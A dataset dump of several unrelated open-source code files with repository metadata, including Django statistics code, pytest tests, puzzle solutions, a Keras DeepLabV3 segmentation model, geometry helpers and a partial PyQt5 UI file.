pseudoPixels/SciWorCS | 14,250,701,507,936 | aabbf355e9c1091e749887f02ed8eccac26547d4 | 893f83189700fefeba216e6899d42097cc0bec70 | /app_collaborative_sci_workflow/pipeline_modules/NiCAD_abstracting/NiCAD_abstracting_settings.py | 0c3a032ba4833cfde22a577011b0dcb42220f822 | [
"MIT"
]
| permissive | https://github.com/pseudoPixels/SciWorCS | 79249198b3dd2a2653d4401d0f028f2180338371 | e1738c8b838c71b18598ceca29d7c487c76f876b | refs/heads/master | 2021-06-10T01:08:30.242094 | 2018-12-06T18:53:34 | 2018-12-06T18:53:34 | 140,774,351 | 0 | 1 | MIT | false | 2021-06-01T22:23:47 | 2018-07-12T23:33:53 | 2018-12-06T20:27:54 | 2021-06-01T22:23:45 | 593,244 | 0 | 1 | 4 | Python | false | false |
granularity = 'functions'
language = 'java'
input_source='/home/ubuntu/Webpage/app_collaborative_sci_workflow/workflow_outputs/test_workflow/filter.xml'
abstraction='none'
output_destination= '/home/ubuntu/Webpage/app_collaborative_sci_workflow/workflow_outputs/test_workflow/abstract' | UTF-8 | Python | false | false | 287 | py | 877 | NiCAD_abstracting_settings.py | 426 | 0.815331 | 0.815331 | 0 | 5 | 56.2 | 113 |
idradm/evaluation-tool | 9,637,906,633,170 | e55f7cac95089160250d76ab429fed61fb16a7ae | 816a8af104f9a68340feac749100e49085dbefef | /hlidskjalf/stats.py | 51e3064ca4e736d819e37c162348747a93cadb19 | []
| no_license | https://github.com/idradm/evaluation-tool | efe5c9cee57c000e73d7ee269615881a8ef3c713 | 2b9d16e1095f53218744496af58d5186596a4922 | refs/heads/master | 2021-01-22T22:45:03.545046 | 2014-06-27T15:11:30 | 2014-06-27T15:11:30 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from hlidskjalf.models import DataItem, ResultItem, Stat, Type
class Stats(object):
@staticmethod
def get(run):
stats = Stat.objects.filter(run=run)
total, found, coverage, real = (0, 0, 0, 0)
type_coverages = {}
for stat in stats:
if stat.type:
type_coverages[stat.type.name] = [
stat.found,
round((float(stat.found) / float(stat.total)) * 100, 2)
]
else:
total = stat.total
found = stat.found
coverage = round((float(found) / float(total)) * 100, 2)
if 'OK' in type_coverages:
real = round(coverage * type_coverages['OK'][1] / 100, 2)
return {
'total': total,
'found': found,
'coverage': coverage,
'real_coverage': real,
'types': type_coverages
}
@staticmethod
def calculate(run):
results = ResultItem.objects.filter(run=run)
total = len(DataItem.objects.filter(set=run.set))
found = len(results)
Stats.save(run, None, (total, found))
types = {}
for result in results:
if result.result is not None:
if result.result.type is not None:
if result.result.type.name not in types:
types[result.result.type.name] = 0
types[result.result.type.name] += 1
for type, value in types.items():
Stats.save(run, Type.objects.get(name=type), (found, value))
@staticmethod
def save(run, type, values):
(total, found) = values
stat = Stat.objects.filter(run=run, type=type)
if not stat:
stat = Stat(run=run, type=type)
else:
stat = stat[0]
stat.total = total
stat.found = found
stat.save()
| UTF-8 | Python | false | false | 1,920 | py | 23 | stats.py | 15 | 0.511458 | 0.501042 | 0 | 63 | 29.47619 | 75 |
anthon-alindada/sanic_messaging | 18,124,762,008,601 | 666c702c39a5b27271d773e41ae215a544750569 | 2c39ce33f9ba4bcc3b49af4730fdb74b010647bb | /app/domain/messaging/tests/stores/test_message_store.py | 9151596620b4c8430049439187fbb2fc8525d01c | [
"MIT"
]
| permissive | https://github.com/anthon-alindada/sanic_messaging | 967eb706368bfa10f737818d2aa2661184ad997e | 2afbc601790b4a3dbe17e0a95c589412250d8bee | refs/heads/master | 2023-01-21T07:57:47.245728 | 2019-07-05T14:52:08 | 2019-07-05T14:52:08 | 190,910,607 | 1 | 0 | MIT | false | 2023-01-14T00:39:23 | 2019-06-08T16:30:57 | 2019-07-05T14:56:59 | 2023-01-14T00:39:22 | 4,065 | 1 | 0 | 28 | Python | false | false | # -*- coding: utf-8
# Core
import pytest
# Models
from app.domain.messaging.models import Message
# Messaging context
from ... import messaging_context
@pytest.fixture
def message_store():
return messaging_context.message_store()
async def test_create(message_data, message_store):
message = await message_store.create(
content='This is a sample message',
author_id=1,
channel_id=1)
assert message.id is not None, 'Should create message'
assert isinstance(message, Message), 'Should create message'
async def test_set_content(message_data, message_store):
message = message_data[0]
message = await message_store.set_content(
message=message, content='New content')
await message_store.save()
assert message.content == 'New content', 'Should set message content'
| UTF-8 | Python | false | false | 836 | py | 96 | test_message_store.py | 83 | 0.704545 | 0.699761 | 0 | 33 | 24.333333 | 73 |
decadegraphy/decadegraphy | 18,236,431,163,559 | d16b0cdcdbe91a392e5f8fd576a877e69db2aa47 | d8cb92bb9b552fa24365ff7a6682f458ef8695e6 | /restapi/urls.py | ed343562bd37d6b7647b76ec4a51996979a98de4 | []
| no_license | https://github.com/decadegraphy/decadegraphy | ee7b7869883804399c7f08459310571c6556a7d0 | a38f29b5aea43bb4acf50d9e868dbed888636419 | refs/heads/master | 2021-01-01T18:13:05.287704 | 2018-07-21T03:42:03 | 2018-07-21T03:42:03 | 98,275,330 | 8 | 9 | null | false | 2017-09-16T03:31:34 | 2017-07-25T07:04:12 | 2017-08-31T15:48:24 | 2017-09-16T03:31:33 | 154 | 8 | 4 | 0 | Python | null | null | from rest_framework import viewsets, routers
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from works.api import WorkViewSet
class UserAuthViewSet(viewsets.ViewSet):
permission_classes = (IsAuthenticated,)
def list(self, request):
return Response({'username': request.user.username, 'id': request.user.id})
router = routers.SimpleRouter()
router.register(r'users/auth', UserAuthViewSet, base_name='users_auth')
router.register(r'works', WorkViewSet)
urlpatterns = router.urls
| UTF-8 | Python | false | false | 551 | py | 33 | urls.py | 26 | 0.778584 | 0.778584 | 0 | 17 | 31.411765 | 83 |
RamaryUp/codingame | 6,871,947,720,644 | a97898979e2ddf3ce566b82c9546ecefffd767ea | d1f5284f99f5314b31311e63f1358774ed7353cc | /Python/minimalnumberofswaps.py | 6333530dac416b70dfe21ca5d493e212ca8d21b2 | []
| no_license | https://github.com/RamaryUp/codingame | dfe699e2b5e18565562acbab6fbf0229b5de02b4 | 16fc7b907113994610ad3b72f86a1da0e700c63e | refs/heads/master | 2021-01-16T19:08:16.944425 | 2018-02-04T23:05:24 | 2018-02-04T23:05:24 | 100,143,411 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Codingame challenge
# Name : Minimal number of swaps
# Category : Community puzzles
# URL : https://www.codingame.com/training/easy/minimal-number-of-swaps
# Selected programming language : Python 3.5.3
'''
-----------------------------------------------------------------------------------
Goal
Given a list of 1 and 0, you must regroup all the 1 at the begin of the list in a minimum number of steps.
A step is the interchange of two elements located at different positions.
The expected result is the minimum number of steps required to obtain a sorted list.
Input
Line 1: an integer N.
Line 2: a list of N numbers that can take the values 0 or 1.
Output
Line 1 : The minimum number of steps to regroup all the 1 at the beginning of the list.
Constraints
1 ≤ N < 500
Example
Input
5
1 0 1 0 1
Output
1
-----------------------------------------------------------------------------------
'''
n, l = int(input()), input().split()
nb1 = l.count('1')
# The nummber of swaps required is equal to the number of "1" that are not yet grouped in the target block of "1"
nbexchanges = l[nb1:].count('1')
print(nbexchanges)
| UTF-8 | Python | false | false | 1,127 | py | 33 | minimalnumberofswaps.py | 30 | 0.623111 | 0.597333 | 0 | 37 | 29.405405 | 113 |
Mrd278/Codeforces_Java | 11,038,065,962,339 | ca6d5eb6e80f21168162116b6233e9ebc65d31ab | a1a15238fc09c8b19504deb6d2610d3d315e7430 | /ServiceLane.py | 9174576c74485205ea4cc6b404e375ce071cef93 | []
| no_license | https://github.com/Mrd278/Codeforces_Java | d84b53e1afe66dd468cb4b878be31e8e8c779e65 | b0984f2b74e3a1c75d7de3ef0b33c86dc39e8d91 | refs/heads/master | 2020-12-27T15:45:13.641177 | 2020-07-15T10:19:34 | 2020-07-15T10:19:34 | 237,956,866 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | n, t = map(int, input().split())
x = list(map(int, input().split()))
for i in range(t):
a,b = map(int, input().split())
print(min(x[a:b+1])) | UTF-8 | Python | false | false | 148 | py | 280 | ServiceLane.py | 280 | 0.547297 | 0.540541 | 0 | 5 | 28.8 | 35 |
chuzcjoe/Leetcode | 18,562,848,663,667 | ab842b457608cb4ffce2b07dadab1552928cf350 | 81b80dcb5dae151903bed55bc717942edb4ecadb | /121. Best Time to Buy and Sell Stock.py | ca1d5458f58093000d5493130352bd9fe2ea9851 | []
| no_license | https://github.com/chuzcjoe/Leetcode | 742bbb71e08ae8833865174b40e4a8f3c2529916 | a6eb22c3f84459c3c054c00aec59d0d87b685bfa | refs/heads/master | 2021-07-10T15:40:47.332063 | 2020-09-27T23:54:13 | 2020-09-27T23:54:13 | 198,936,895 | 6 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution:
def maxProfit(self, prices: List[int]) -> int:
left = 0
res = 0
for right in range(1,len(prices)):
while prices[left] > prices[right]:
left += 1
res = max(res, prices[right]-prices[left])
return res | UTF-8 | Python | false | false | 356 | py | 392 | 121. Best Time to Buy and Sell Stock.py | 386 | 0.418539 | 0.407303 | 0 | 14 | 23.571429 | 54 |
CarlosGAO/GetMachineinfor_py | 3,307,124,837,067 | 5d335159e5e8305d87e660c5c6c17983c31867d4 | 67ca863be8b556fbf2b81e1d3b759c1a0f4a8054 | /handlers.py | 6bd3f4910171a3af314a82e1a35013fa7a17d5ac | []
| no_license | https://github.com/CarlosGAO/GetMachineinfor_py | a89b35b5376a6ae82446c235723454145f92f0e1 | 92f4a29fb1c355c04c5cb59f28ff9c8815864683 | refs/heads/master | 2021-01-09T20:15:33.051304 | 2016-08-02T06:52:54 | 2016-08-02T06:52:54 | 64,727,092 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
from __future__ import division
class Handler():
###GET OS VERTION##########################################
def os_ver(self,datasrc):
self.f = open(datasrc, 'r')
for line in self.f:
line = line.strip()
if line.startswith('Description:'):
self.os = line.split(':')[1].strip()
else:
continue
self.f.close()
return self.os
###GET PRODUCTION INFORMATION##############################
def production_info(self,datasrc):
self.f = open(datasrc, 'r')
self.production = None
self.sn = None
for line in self.f:
line = line.strip()
if line.startswith('Product Name'):
self.production = line.split(':')[1].strip()
elif line.startswith('Serial Number'):
self.sn = line.split(':')[1].strip()
else:
continue
self.f.close()
return self.production,self.sn
###GET CPU INFORMAITON#####################################
def cpu_info(self,datasrc):
self.cpu_mod = False
self.cpu_count = 0
self.f = open(datasrc,'r')
for data in self.f:
if data.startswith('model name'):
if not self.cpu_mod:
self.cpu_mod = data.split(':')[1].strip()
self.cpu_count += 1
self.f.close()
return ''.join(self.cpu_mod.split()),int(self.cpu_count)
###GET MEMORY INFORMAITON##################################
def mem_info(self,datasrc):
self.f = open(datasrc,'r')
for line in self.f:
if line.startswith('MemTotal:'):
self.mem_total = int(line.split()[1])
elif line.startswith('MemFree:'):
self.mem_free = int(line.split()[1])
elif line.startswith('Buffers:'):
self.mem_buffers = int(line.split()[1])
elif line.startswith('Cached:'):
self.mem_cache = int(line.split()[1])
else:
continue
self.f.close()
self.usege_percent = '%.2f%%' % float((self.mem_total-self.mem_free-self.mem_buffers-self.mem_cache)/self.mem_total*100)
self.mem_total = '%.2fG' % float(self.mem_total/1024/1024)
return self.mem_total,self.usege_percent
###GET DISK INFORMATION####################################
def disk_info(self,datasrc):
self.f = open(datasrc,'r')
for line in self.f:
if line.startswith('/dev/'):
yield line.split()
else:
continue
self.f.close()
def disk_data(self,diskhandler,datasrc):
self.used_total = 0
self.disk_total = 0
for disk_data in diskhandler(datasrc):
Total = '%.2f%s' % (float(int(disk_data[1])/1024),"G")
Used = '%.2f%s' % (float(int(disk_data[2])/1024),"G")
self.used_total += float(int(disk_data[2])/1024)
self.disk_total += float(int(disk_data[1])/1024)
self.used_total = '%.2f%s' % (self.used_total,"G")
self.disk_total = '%.2f%s' % (self.disk_total,"G")
return self.used_total,self.disk_total
| UTF-8 | Python | false | false | 3,219 | py | 6 | handlers.py | 5 | 0.497049 | 0.481827 | 0 | 84 | 37.321429 | 128 |
yshenkai/DeepLabV3 | 18,777,597,050,301 | f79074214b6538a2b214d4908203f48d436dba70 | b0e71a6b8854e3c13f7b06432f9fbd626a2bdcab | /model.py | 5e8680b4f0bc2b0c21844f7daa40d2bcefe5dc41 | []
| no_license | https://github.com/yshenkai/DeepLabV3 | 3517aee142b4870ed75f44e39d471fb445fd0bc2 | 8e4ba0c4e856da109518764cae1e03b4e2a751ff | refs/heads/master | 2020-08-08T11:18:41.479909 | 2019-10-09T04:33:12 | 2019-10-09T04:33:12 | 213,820,500 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from keras.models import Model
from keras.layers import Input,Conv2D,DepthwiseConv2D,Activation,BatchNormalization,Add,Concatenate,ZeroPadding2D,Reshape,Lambda
from keras.layers import UpSampling2D,AveragePooling2D,Dropout
from keras.engine.topology import get_source_inputs
from keras import backend as K
from keras.utils.np_utils import to_categorical
from keras.optimizers import Adam
import tensorflow as tf
import numpy as np
def sparse_crossentropy_ignoring_last_label(y_true, y_pred):
y_true = y_true[:,:,:-1]
return K.categorical_crossentropy(y_true, y_pred)
def sparse_accuracy_ignoring_last_label(y_true, y_pred):
#nb_classes = K.int_shape(y_pred)[-1]
y_pred = K.reshape(y_pred, (-1, 21))
y_true=y_true[:,:,:-1]
y_true = K.argmax(K.reshape(y_true,(-1,21)),axis=-1)
legal_labels = ~K.equal(y_true, 255)
return K.sum(tf.to_float(legal_labels & K.equal(y_true,
K.argmax(y_pred, axis=-1)))) / K.sum(tf.to_float(legal_labels))
def Jaccard(y_true, y_pred):
nb_classes = K.int_shape(y_pred)[-1]
iou = []
pred_pixels = K.argmax(y_pred, axis=-1)
for i in range(0, nb_classes): # exclude first label (background) and last label (void)
true_labels = K.equal(y_true[:,:,0], i)
pred_labels = K.equal(pred_pixels, i)
inter = tf.to_int32(true_labels & pred_labels)
union = tf.to_int32(true_labels | pred_labels)
legal_batches = K.sum(tf.to_int32(true_labels), axis=1)>0
ious = K.sum(inter, axis=1)/K.sum(union, axis=1)
iou.append(K.mean(tf.gather(ious, indices=tf.where(legal_batches)))) # returns average IoU of the same objects
iou = tf.stack(iou)
legal_labels = ~tf.debugging.is_nan(iou)
iou = tf.gather(iou, indices=tf.where(legal_labels))
return K.mean(iou)
def _conv_same(x,filters,kernel_size=3,strides=1,rate=1):
if strides==1:
return Conv2D(filters=filters,kernel_size=kernel_size,strides=1,padding="same",use_bias=False,dilation_rate=rate)(x)
else:
pad_total=kernel_size+(kernel_size-1)*(rate-1)-1
pad_beg=pad_total//2
pad_end=pad_total-pad_beg
x=ZeroPadding2D(padding=(pad_beg,pad_end))(x)
return Conv2D(filters==filters,kernel_size=kernel_size,strides=strides,dilation_rate=rate,padding="valid")(x)
def _Sep_Conv_BN(x,filters,kernel_size=3,strides=1,rate=1,depth_activation=False,epilon=1e-3):
if strides==1:
depth_pad="same"
else:
pad_total=kernel_size+(kernel_size-1)*(rate-1)-1
pad_beg=pad_total//2
pad_end=pad_total-pad_beg
x=ZeroPadding2D(padding=(pad_beg,pad_end))(x)
depth_pad="valid"
if not depth_activation:
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=kernel_size,strides=strides,dilation_rate=rate,padding=depth_pad,use_bias=False)(x)
x=BatchNormalization(epsilon=epilon)(x)
if depth_activation:
x=Activation("relu")(x)
x=Conv2D(filters=filters,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=epilon)(x)
if depth_activation:
x=Activation("relu")(x)
return x
def _Xception_block(x,filters_list,kernel_size=3,strides=1,rate=1,depth_activation=False,epilon=1e-3,middle_Conv=True,return_skip=False):
middle=x
for i in range(len(filters_list)):
x=_Sep_Conv_BN(x,filters=filters_list[i],kernel_size=kernel_size,strides=strides if i ==2 else 1,rate=rate,depth_activation=depth_activation)
if return_skip & i==1:
skip=x
if middle_Conv:
middle=_conv_same(middle,filters=filters_list[-1],kernel_size=1,strides=strides,rate=rate)
middle=BatchNormalization(epsilon=epilon)(middle)
x=Add()([middle,x])
if return_skip:
return x,skip
else:
return x
def DeepLabV3(weights="pascal_voc",input_tensor=None,input_shape=(256,256,3),infer=False,classes=21):
if input_tensor is None:
input=Input(shape=input_shape)
else:
if not K.is_keras_tensor(input_tensor):
input=Input(shape=input_shape,tensor=input_tensor)
else:
input=input_tensor
#input=Input(shape=input_shape)
x=Conv2D(filters=32,kernel_size=3,strides=2,use_bias=False)(input)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation("relu")(x)
x=Conv2D(filters=64,kernel_size=3,padding="same")(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=_Xception_block(x,filters_list=[128,128,128],kernel_size=3,strides=2,rate=1,depth_activation=False,middle_Conv=True)
x,skip=_Xception_block(x,filters_list=[256,256,256],kernel_size=3,strides=2,rate=1,depth_activation=False,middle_Conv=True,return_skip=True)
x=_Xception_block(x,filters_list=[728,728,728],kernel_size=3,strides=1,rate=1,depth_activation=False)
for i in range(16):
x=_Xception_block(x,filters_list=[728,728,728],kernel_size=3,strides=1,rate=1,depth_activation=False,middle_Conv=False)
x=_Xception_block(x,filters_list=[728,1024,1024],strides=1,kernel_size=3,rate=1,depth_activation=False)
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=Conv2D(filters=1536,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=Conv2D(filters=1536,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=Conv2D(filters=2048,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
d1=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
d1=BatchNormalization()(d1)
d1=Activation("relu")(d1)
d2=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",dilation_rate=6,use_bias=False)(x)
d2=BatchNormalization()(d2)
d2=Activation("relu")(d2)
d2=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(d2)
d2=BatchNormalization()(d2)
d2=Activation("relu")(d2)
d3=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",dilation_rate=12,use_bias=False)(x)
d3=BatchNormalization()(d3)
d3=Activation("relu")(d3)
d3=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(d3)
d3=BatchNormalization()(d3)
d3=Activation("relu")(d3)
d4=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",dilation_rate=18,use_bias=False)(x)
d4=BatchNormalization()(d4)
d4=Activation("relu")(d4)
d4=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(d4)
d4=BatchNormalization()(d4)
d4=Activation("relu")(d4)
d5=AveragePooling2D(pool_size=(int(np.ceil(input_shape[0]/8)),int(np.ceil(input_shape[1]/8))))(x)
d5=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(d5)
d5=BatchNormalization()(d5)
d5=Activation("relu")(d5)
d5=Lambda(lambda x:K.tf.image.resize_bilinear(x,size=(int(np.ceil(input_shape[0]/8)),int(np.ceil(input_shape[1]/8)))))(x)
x=Concatenate()([d1,d2,d3,d4,d5])
x=Conv2D(256,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization()(x)
x=Activation("relu")(x)
x=Dropout(0.1)(x)
x=Lambda(lambda x:K.tf.image.resize_bilinear(x,size=(int(np.ceil(input_shape[0]/4)),int(np.ceil(input_shape[1]/4)))))(x)
skip=Conv2D(filters=48,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
skip=BatchNormalization()(skip)
skip=Activation("relu")(skip)
x=Concatenate()([x,skip])
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation("relu")(x)
x=Conv2D(filters=256,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation("relu")(x)
x=DepthwiseConv2D(kernel_size=3,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation("relu")(x)
x=Conv2D(filters=256,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=BatchNormalization(epsilon=1e-5)(x)
x=Activation('relu')(x)
x=Conv2D(classes,kernel_size=1,strides=1,padding="same",use_bias=False)(x)
x=Lambda(lambda x:K.tf.image.resize_bilinear(x,size=(input_shape[0],input_shape[1])))(x)
x=Reshape((input_shape[0]*input_shape[1],classes))(x)
x=Activation("softmax")(x)
if input_tensor is not None:
input=get_source_inputs(input_tensor)
else:
input=input
model=Model(input,x,name="deeplabv3")
model.compile(optimizer=Adam(lr=7e-4,epsilon=1e-8,decay=1e-6),loss=sparse_crossentropy_ignoring_last_label,metrics=[sparse_accuracy_ignoring_last_label,Jaccard])
return model
model=DeepLabV3()
model.summary()
# def get_model():
# input= | UTF-8 | Python | false | false | 9,153 | py | 5 | model.py | 5 | 0.679449 | 0.641538 | 0 | 211 | 42.383886 | 165 |
JosephFranc/scribe | 15,212,774,192,247 | d2ec5be62115b9479d01ea7c431c497c4c319929 | 187b793afe39b5de5ea9f90adf721cc9274722ca | /getTextLineDots.py | a872dbac89d7383035c8d9f2eb48c11ee9afc9f0 | []
| no_license | https://github.com/JosephFranc/scribe | 890614e65b41a93a08cb863b1de014106cb2c79b | 7b8691104968d3b209a71321028e5fdf754530fe | refs/heads/master | 2020-12-24T11:36:56.262299 | 2016-12-17T03:48:46 | 2016-12-17T03:48:46 | 73,027,666 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import cv2
'''
Find bottom points of each line of text that could do robust linear regression on
Dots are shown in green circles (r = 1 pixel)
'''
def getTextLineBox(gray):
_,thresh = cv2.threshold(gray,150,255,cv2.THRESH_BINARY_INV) # threshold
kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))
dilated = cv2.dilate(thresh,kernel,iterations = 2) # need calibration on this for different format
cv2.imwrite("out.jpg", dilated)
out, contours, hierarchy = cv2.findContours(dilated,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE) # get contours
pts = []
# for each contour found, draw a rectangle around it on original image
for contour in contours:
# get rectangle bounding contour
[x,y,w,h] = cv2.boundingRect(contour) # can return this box here
# branch and bound
# # discard areas that are too small
if h<8 or w<8:
continue
for i in range(x, x+w, 1):
#cv2.circle(image, (x+i,y+h), 1, (0,255,0)) # illustrate
pts.append((x+i,y+h))
return pts
| UTF-8 | Python | false | false | 1,074 | py | 17 | getTextLineDots.py | 16 | 0.648976 | 0.620112 | 0 | 32 | 32.5625 | 111 |
HenryBalthier/Python-Learning | 3,186,865,752,570 | 1c6aa52cfe852f1e582d5dc91cfb55daa14e5c3e | ad43681693a65fee270ef8d6ab1ed2b59c5391f2 | /Leetcode_medium/array/39.py | 862245caa5dfdb4ea2b7667e661da424b2b04a66 | []
| no_license | https://github.com/HenryBalthier/Python-Learning | 7def31dad56a9d754762839000733fd9443c4576 | 93cbb01487a61e37159e8bdd4bf40f623e131c19 | refs/heads/master | 2021-01-24T08:11:39.857854 | 2017-09-24T12:19:27 | 2017-09-24T12:19:27 | 93,374,219 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class Solution(object):
def combinationSum(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
if candidates == []:
return []
cand = sorted(candidates, reverse=True)
result = []
lenth = len(cand)
def helper(res, index):
if index >= lenth:
return
s = sum(res)
for i, v in enumerate(cand[index:]):
if s + v < target:
helper(res+[v], index+i)
elif s + v > target:
continue
else:
result.append(res + [v])
helper([], 0)
return result
s = Solution()
x = [2,3,4,1]
t = 7
print(s.combinationSum(x, t)) | UTF-8 | Python | false | false | 820 | py | 237 | 39.py | 235 | 0.442683 | 0.435366 | 0 | 31 | 25.483871 | 49 |
octeufer/Annotate_Optimize | 19,052,474,937,464 | f699b4d17589eb1e91aefc6c2090f5ef23e11241 | 5c0ed45894794670f6a5f18992d8c1f1f481c510 | /crossalgorithm.py | 5bbe6662e2a449528cc4f25fa8d3b8771f3eb310 | [
"Apache-2.0"
]
| permissive | https://github.com/octeufer/Annotate_Optimize | 97275eb96a6df37f7389181df84659a9ebfaec44 | 32d9cecc0159882d3f962990aba07168c4a023f5 | refs/heads/master | 2022-09-09T09:43:26.362393 | 2020-06-02T21:47:20 | 2020-06-02T21:47:20 | 54,598,397 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def crossornot(line1,line2):
d1 = crossf(line1[0],line1[1],line1[0],line2[0])
d2 = crossf(line1[0],line1[1],line1[0],line2[1])
d3 = crossf(line2[0],line2[1],line2[0],line1[0])
d4 = crossf(line2[0],line2[1],line2[0],line1[1])
if d1*d2 < 0 and d3*d4 < 0:
return True
else:
return False
def crossf(p1,p2,q1,q2):
x1 = p2[0] - p1[0]
y1 = p2[1] - p1[1]
x2 = q2[0] - q1[0]
y2 = q2[1] - q1[1]
return x1*y2 - x2*y1
def getsegs(roadpath):
segs=list()
reader = shapefile.Reader(roadpath)
for sr in reader.shapeRecords():
segs.extend([(sr.shape.__geo_interface__["coordinates"][i],sr.shape.__geo_interface__["coordinates"][i+1]) for i in range(len(sr.shape.__geo_interface__["coordinates"])-1)])
npsegs = np.array(segs)
return segs,npsegs
def psnapseg(p,segs):
nearestseg = tuple()
nearest = float(1000000000000000)
for seg in segs:
xmid = (float(seg[0][0]) + float(seg[1][0])) / 2
ymid = (float(seg[0][1]) + float(seg[1][1])) / 2
dis = math.sqrt(math.pow((p[0]-xmid), 2) + math.pow((p[1]-ymid),2))
#print nearest,dis
if dis < nearest:
nearest = dis
nearestseg = seg
return nearestseg | UTF-8 | Python | false | false | 1,286 | py | 9 | crossalgorithm.py | 8 | 0.553738 | 0.472741 | 0 | 37 | 32.756757 | 181 |
d33psky/mountwizzard | 13,632,226,206,190 | a4442fdd5f08f8b3307f66e41ccd30bcfcc26a1c | ecd8456f0ce01d6020a085fdbf789c9902fc4fd0 | /mountwizzard/support/coordinate_dialog_ui.py | e9ae549688adcc0dfe8652faefce1143e1423c04 | []
| no_license | https://github.com/d33psky/mountwizzard | 05fd28ae650c92d7aa3135927320c37b2fae61ab | cbd17d722cafe1f8e1316bce5f8bcbfa8005ac6b | refs/heads/master | 2021-01-17T14:05:32.899626 | 2017-03-16T19:39:14 | 2017-03-16T19:39:14 | 83,466,180 | 0 | 0 | null | true | 2017-02-28T18:33:46 | 2017-02-28T18:33:46 | 2017-02-22T22:35:02 | 2017-02-26T19:53:02 | 31,502 | 0 | 0 | 0 | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'coordinate_dialog_ui.ui'
#
# Created by: PyQt5 UI code generator 5.7.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_CoordinateDialog(object):
def setupUi(self, CoordinateDialog):
CoordinateDialog.setObjectName("CoordinateDialog")
CoordinateDialog.resize(791, 671)
self.windowTitle = QtWidgets.QLabel(CoordinateDialog)
self.windowTitle.setGeometry(QtCore.QRect(0, 0, 791, 31))
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.windowTitle.setFont(font)
self.windowTitle.setAutoFillBackground(True)
self.windowTitle.setAlignment(QtCore.Qt.AlignCenter)
self.windowTitle.setObjectName("windowTitle")
self.btn_selectClose = QtWidgets.QPushButton(CoordinateDialog)
self.btn_selectClose.setGeometry(QtCore.QRect(750, 0, 41, 31))
font = QtGui.QFont()
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.btn_selectClose.setFont(font)
self.btn_selectClose.setObjectName("btn_selectClose")
self.modelPointsPlot = QtWidgets.QGraphicsView(CoordinateDialog)
self.modelPointsPlot.setGeometry(QtCore.QRect(10, 70, 771, 371))
self.modelPointsPlot.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.ArrowCursor))
self.modelPointsPlot.setAcceptDrops(False)
self.modelPointsPlot.setAutoFillBackground(True)
self.modelPointsPlot.setFrameShadow(QtWidgets.QFrame.Plain)
self.modelPointsPlot.setInteractive(False)
self.modelPointsPlot.setSceneRect(QtCore.QRectF(0.0, 0.0, 769.0, 369.0))
self.modelPointsPlot.setObjectName("modelPointsPlot")
self.modellingLog = QtWidgets.QTextBrowser(CoordinateDialog)
self.modellingLog.setGeometry(QtCore.QRect(10, 450, 771, 211))
font = QtGui.QFont()
font.setFamily("MS Shell Dlg 2")
font.setPointSize(8)
self.modellingLog.setFont(font)
self.modellingLog.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.modellingLog.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.modellingLog.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustToContents)
self.modellingLog.setAcceptRichText(False)
self.modellingLog.setObjectName("modellingLog")
self.le_telescopeAzimut = QtWidgets.QLineEdit(CoordinateDialog)
self.le_telescopeAzimut.setGeometry(QtCore.QRect(60, 40, 81, 21))
font = QtGui.QFont()
font.setFamily("Courier")
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
